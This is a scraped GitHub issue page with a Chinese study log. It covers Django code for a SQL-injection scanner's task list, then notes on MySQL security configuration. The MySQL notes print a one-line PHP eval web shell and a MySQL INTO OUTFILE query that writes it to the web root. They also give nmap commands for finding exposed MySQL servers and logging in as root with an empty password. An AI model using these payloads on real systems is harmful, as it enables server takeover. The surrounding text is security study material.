We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
The true nobility is in being superior to your pervious self.
views.py
sql_tasks
from django.shortcuts import render from .models import SqlInjection # 显示所有扫描任务 def sql_tasks(request): tasks = SqlInjection.objects.all() return render(request, 'sqliscan/task.html', {'tasks': tasks})
SqlInjection.objects.all()
sqliscan/task.html
task.html
base.html
for
task
{% extends "sqliscan/base.html" %} {% block title %}DSScan{% endblock %} {% block content %} <div class="panel panel-default"> <div class="panel-heading"> <i class="glyphicon glyphicon-tasks"></i> TASK 任务列表 <span class="label label-warning pull-right">1</span> </div> <div class="panel-body"> <table class="table table-striped table-hover"> <thead> <th>URL</th> <th>TASKID</th> <th>LOG</th> <th>STATUS</th> </thead> <tbody> {% for task in tasks %} <tr> <td>{{ task.target_url }}</td> <td>{{ task.task_id }}</td> <td>{{ task.scan_log }}</td> <td>{{ task.scan_status }}</td> </tr> {% endfor %} </tbody> </table> </div> </div> {% endblock %}
min-width
URL
urls.py
url(r'^$', 'sqliscan.views.sql_tasks', name='sql_tasks'),
import
views
from django.conf.urls import url from django.contrib import admin from sqliscan import views urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^$', views.sql_tasks, name='sql_tasks'), ]
Wooyun
Wooyun Wiki
Drops Wiki
机器学习
浏览器安全
服务配置-FTP安全配置
GitHub
Pentest Wiki
MySQL
phpmyadmin
shell
/www/shell.php
<?php eval($_REQUEST[cmd]);?>
mysql> select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile '/www/shell.php'
3306
//扫描 nmap -n --open -p 3306 X.X.X.X/24 //使用root用户和空口令连接MySQL服务器 mysql -h X.X.X.X -u root //通过nmap扫描MySQL相关的漏洞 //检测MySQL空口令 nmap -p3306 --script=mysql-empty-password.nse 192.168.5.1 //检测nmap中支持扫描的所有MySQL漏洞 nmap -p3306 --script=mysql* 192.168.5.1
FREEBUF
详解Mysql安全配置
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 DSScan
views.pysql_tasks视图函数用于渲染显示所有任务SqlInjection.objects.all()获取所有任务对象sqliscan/task.html为模板文件,用于前端显示task.html继承base.html,利用面板嵌套表格来显示所有任务for循环来显示每个task{% extends "sqliscan/base.html" %} {% block title %}DSScan{% endblock %} {% block content %} <div class="panel panel-default"> <div class="panel-heading"> <i class="glyphicon glyphicon-tasks"></i> TASK 任务列表 <span class="label label-warning pull-right">1</span> </div> <div class="panel-body"> <table class="table table-striped table-hover"> <thead> <th>URL</th> <th>TASKID</th> <th>LOG</th> <th>STATUS</th> </thead> <tbody> {% for task in tasks %} <tr> <td>{{ task.target_url }}</td> <td>{{ task.task_id }}</td> <td>{{ task.scan_log }}</td> <td>{{ task.scan_status }}</td> </tr> {% endfor %} </tbody> </table> </div> </div> {% endblock %}min-width设置URL配置文件urls.pyurl(r'^$', 'sqliscan.views.sql_tasks', name='sql_tasks'),会提示错误import导入views即可0x02 Drops Wiki
Wooyun出事后,Wooyun Wiki就消失了,现在有Drops Wiki替代了Wooyun Wiki,还集成了机器学习和浏览器安全,虽然之前一些Wooyun的案例失效了,但它还是一个非常优秀值得学习的资料,只怪当初没能将Wooyun Wiki更新完(之前学到服务配置-FTP安全配置),现在继续学习(GitHub上也有一个类似的Pentest Wiki)MySQL安全配置MySQL配置导致的漏洞往往都是多个因素共同造成的phpmyadmin等数据库管理工具或者MySQL允许远程连接,加上MySQL没有修改掉默认的用户或者使用了弱口令MySQL时需要对用户权限进行限制MySQL数据库操作权限后,若服务器没有禁止MySQL对本地文件进行存取,可以通过写入shell,最终完全控制服务器/www/shell.php文件中MySQL默认端口为3306,当数据库允许远程连接时该端口会对外开放,通过对3306端口进行扫描就可以找到对外开放的MySQL服务器//扫描 nmap -n --open -p 3306 X.X.X.X/24 //使用root用户和空口令连接MySQL服务器 mysql -h X.X.X.X -u root //通过nmap扫描MySQL相关的漏洞 //检测MySQL空口令 nmap -p3306 --script=mysql-empty-password.nse 192.168.5.1 //检测nmap中支持扫描的所有MySQL漏洞 nmap -p3306 --script=mysql* 192.168.5.1FREEBUF上有一篇详解Mysql安全配置The text was updated successfully, but these errors were encountered: